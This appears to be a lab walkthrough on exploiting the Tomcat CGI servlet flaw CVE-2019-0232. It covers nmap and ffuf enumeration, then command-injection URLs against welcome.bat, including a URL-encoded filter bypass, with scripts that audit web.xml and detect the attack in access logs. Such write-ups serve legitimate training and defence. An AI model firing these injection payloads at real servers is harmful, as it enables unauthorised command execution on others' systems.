# 17. Attacking Tomcat CGI

### 1. Vulnerability Overview

#### CVE-2019-0232 - Remote Code Execution (RCE)

* **Description:** Allows remote code execution due to improper input validation in the CGI Servlet when `enableCmdLineArguments` is set to `true`.
* **Affected Versions:**
  * Tomcat **9.0.0.M1 to 9.0.17**
  * Tomcat **8.5.0 to 8.5.39**
  * Tomcat **7.0.0 to 7.0.93**
* **Cause:**
  * With `enableCmdLineArguments` set to `true`, the CGI Servlet passes the query string to the script as command-line arguments without adequate validation, so attacker-controlled input reaches the command interpreter (command injection).
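Because the whole issue hinges on the `enableCmdLineArguments` init-param and on the CGI servlet actually being declared and mapped, a defender's first check is the Tomcat `web.xml` itself. The script below is an added example (not code from the page or the Tomcat project): it parses a web.xml fragment, finds every `org.apache.catalina.servlets.CGIServlet` declaration, and reports its init-params, its URL mappings, and whether command-line argument passing is explicitly enabled. The two `web.xml` fragments, the `cgi` servlet name and the `/cgi/*` mapping are constructed to match this page; an absent `enableCmdLineArguments` falls back to the release's documented default, so the record also shows whether the parameter was set at all.

```python
import xml.etree.ElementTree as ET

CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"

# Constructed fragment of a Tomcat conf/web.xml: CGI servlet declared, mapped
# under /cgi/* (as on this page) and with enableCmdLineArguments turned on.
VULNERABLE_WEB_XML = """\
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi/*</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Same fragment with the setting corrected (the hardened configuration).
HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "<param-value>true</param-value>", "<param-value>false</param-value>")


def _local(tag):
    # Strip the XML namespace so lookups work for any web-app schema version.
    return tag.rsplit("}", 1)[-1]


def _text(el):
    return (el.text or "").strip()


def find_cgi_servlets(xml_text):
    """Return one record per CGIServlet declaration found in a web.xml document."""
    root = ET.fromstring(xml_text)
    mappings = {}   # servlet-name -> list of url-patterns
    found = []
    for el in root:
        kind = _local(el.tag)
        fields = {}
        for child in el:
            fields.setdefault(_local(child.tag), []).append(child)
        if kind == "servlet-mapping":
            name = _text(fields["servlet-name"][0])
            mappings.setdefault(name, []).extend(
                _text(p) for p in fields.get("url-pattern", []))
        elif kind == "servlet":
            cls = fields.get("servlet-class")
            if not cls or _text(cls[0]) != CGI_SERVLET_CLASS:
                continue
            params = {}
            for ip in fields.get("init-param", []):
                kv = {_local(c.tag): _text(c) for c in ip}
                params[kv.get("param-name")] = kv.get("param-value")
            found.append({"name": _text(fields["servlet-name"][0]),
                          "params": params})
    for rec in found:
        value = rec["params"].get("enableCmdLineArguments")
        rec["url_patterns"] = mappings.get(rec["name"], [])
        rec["param_present"] = value is not None
        rec["cmd_line_args"] = (value or "").lower() == "true"
        # Reachable only if the servlet is mapped to a URL and args are enabled.
        rec["exposed"] = rec["cmd_line_args"] and bool(rec["url_patterns"])
    return found


if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        for rec in find_cgi_servlets(doc):
            print(label, rec["name"], rec["url_patterns"],
                  "enableCmdLineArguments=%s" % rec["params"].get("enableCmdLineArguments"),
                  "EXPOSED" if rec["exposed"] else "ok")
```

Run it against a real `conf/web.xml` by reading the file into `find_cgi_servlets`; a record with `exposed` true on one of the affected versions listed above is the condition the page describes, and the fix is the `false` value shown in the hardened fragment (or removing the servlet mapping entirely if CGI is not needed).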

***

### 2. Enumeration

#### Nmap Scan

Identify open ports and running services, particularly Apache Tomcat.

```bash
nmap -p- -sC -Pn 10.129.204.227 --open
```

#### CGI Script Discovery (ffuf)

Discover CGI scripts using directory fuzzing.

```bash
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat
```

This command fuzzes for CGI scripts with the `.bat` extension and may reveal `welcome.bat`.

***

### 3. Exploitation

#### Basic Command Injection

Execute the `dir` command to list files.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&dir
```

#### Retrieve Environment Variables

Check for useful system environment variables.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&set
```

This can reveal critical information, such as the `PATH` variable being unset.

#### Hardcoded Path Execution (whoami)

Attempt to execute `whoami.exe` by specifying its full path.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe
```

This may fail if special characters are filtered.

#### URL Encoding Bypass

Bypass character filtering using URL encoding.

```http
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
```

This allows execution of `whoami.exe` despite input restrictions.

***

### 4. Key Considerations

* The `enableCmdLineArguments` setting **must be enabled** for this exploit to work.
* The `&` character is used to separate commands in the injection.
* If the `PATH` environment variable is unset, commands must be executed with their **full path**.
* URL encoding can help bypass character filtering.
* **Only test on systems you have explicit permission to assess.**
* **Replace IP addresses, ports, and URLs with your specific target information.**
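The two traits listed above, a `&`-separated command in a query string that carries no `=` (so the CGI servlet treats it as command-line arguments) and URL encoding of the path characters, are also what makes this activity visible in Tomcat's access log, as is the `.bat` fuzzing from the enumeration step. The script below is an added detection example (not code from the page or from Tomcat): it reads access-log lines in the AccessLogValve `common` pattern, percent-decodes each query string so the encoded variant is caught alongside the plain one, flags CGI requests whose decoded query contains the `&` separator, and counts per-client 404s under the CGI mount to surface directory fuzzing. The log lines, the `/cgi/` and `/cgi-bin/` prefixes and the fuzzing threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Tomcat AccessLogValve "common" pattern; %r records the full request line,
# including the query string, which is what this detection depends on.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
CGI_PREFIXES = ("/cgi/", "/cgi-bin/")   # assumed CGI servlet mounts

# Constructed sample log: a short fuzzing burst, then the requests this page shows.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Mar/2024:10:14:01 +0000] "GET /cgi/index.bat HTTP/1.1" 404 768
10.10.14.5 - - [12/Mar/2024:10:14:01 +0000] "GET /cgi/admin.bat HTTP/1.1" 404 768
10.10.14.5 - - [12/Mar/2024:10:14:02 +0000] "GET /cgi/test.bat HTTP/1.1" 404 768
10.10.14.5 - - [12/Mar/2024:10:14:02 +0000] "GET /cgi/welcome.bat HTTP/1.1" 200 1120
10.10.14.5 - - [12/Mar/2024:10:15:32 +0000] "GET /cgi/welcome.bat?&dir HTTP/1.1" 200 1432
10.10.14.5 - - [12/Mar/2024:10:15:40 +0000] "GET /cgi/welcome.bat?&set HTTP/1.1" 200 2210
10.10.14.5 - - [12/Mar/2024:10:16:02 +0000] "GET /cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe HTTP/1.1" 200 58
10.10.14.9 - - [12/Mar/2024:10:17:10 +0000] "GET /cgi/welcome.bat?name=alice HTTP/1.1" 200 512
10.10.14.9 - - [12/Mar/2024:10:17:15 +0000] "GET /docs/index.html HTTP/1.1" 200 8876
"""


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def injection_finding(rec, prefixes=CGI_PREFIXES):
    """Flag a CGI request whose query is argument-style (no '=') and, once
    percent-decoded, contains the '&' command separator."""
    path, _, query = rec["target"].partition("?")
    if not path.startswith(prefixes) or not query or "=" in query:
        return None
    decoded = unquote(query)
    if "&" not in decoded:
        return None
    return {
        "client": rec["client"],
        "time": rec["time"],
        "path": path,
        "raw_query": query,
        "decoded_query": decoded,
        "encoded": decoded != query,   # True when URL encoding was used
        "status": rec["status"],
    }


def scan_log(text, fuzz_threshold=3, prefixes=CGI_PREFIXES):
    """Return injection findings plus clients whose 404s under the CGI mount
    reach fuzz_threshold (a crude signal for wordlist-based script discovery)."""
    injections, misses = [], Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"].partition("?")[0]
        if path.startswith(prefixes) and rec["status"] == "404":
            misses[rec["client"]] += 1
        finding = injection_finding(rec, prefixes)
        if finding:
            injections.append(finding)
    fuzzing = {client: n for client, n in misses.items() if n >= fuzz_threshold}
    return {"injections": injections, "fuzzing": fuzzing}


if __name__ == "__main__":
    report = scan_log(SAMPLE_LOG)
    for f in report["injections"]:
        print("INJECTION", f["client"], f["path"], repr(f["decoded_query"]),
              "(url-encoded)" if f["encoded"] else "")
    for client, n in report["fuzzing"].items():
        print("FUZZING  ", client, "%d CGI 404s" % n)
```

The "no `=` in the query" condition is deliberate: it mirrors the CGI servlet's own rule for when a query string becomes command-line arguments, so ordinary `key=value` requests to the same script are not reported. Decoding before matching is what keeps the `%3A%5C` variant from slipping past a pattern written for the plain form.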

***

### 5. Commands Summary

```bash
# Nmap Scan - Identify open ports
nmap -p- -sC -Pn 10.129.204.227 --open

# ffuf - Discover CGI scripts
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

# Basic command injection (dir)
http://10.129.204.227:8080/cgi/welcome.bat?&dir

# Retrieve environment variables
http://10.129.204.227:8080/cgi/welcome.bat?&set

# Execute whoami using hardcoded path
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

# URL encoded path execution
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
```
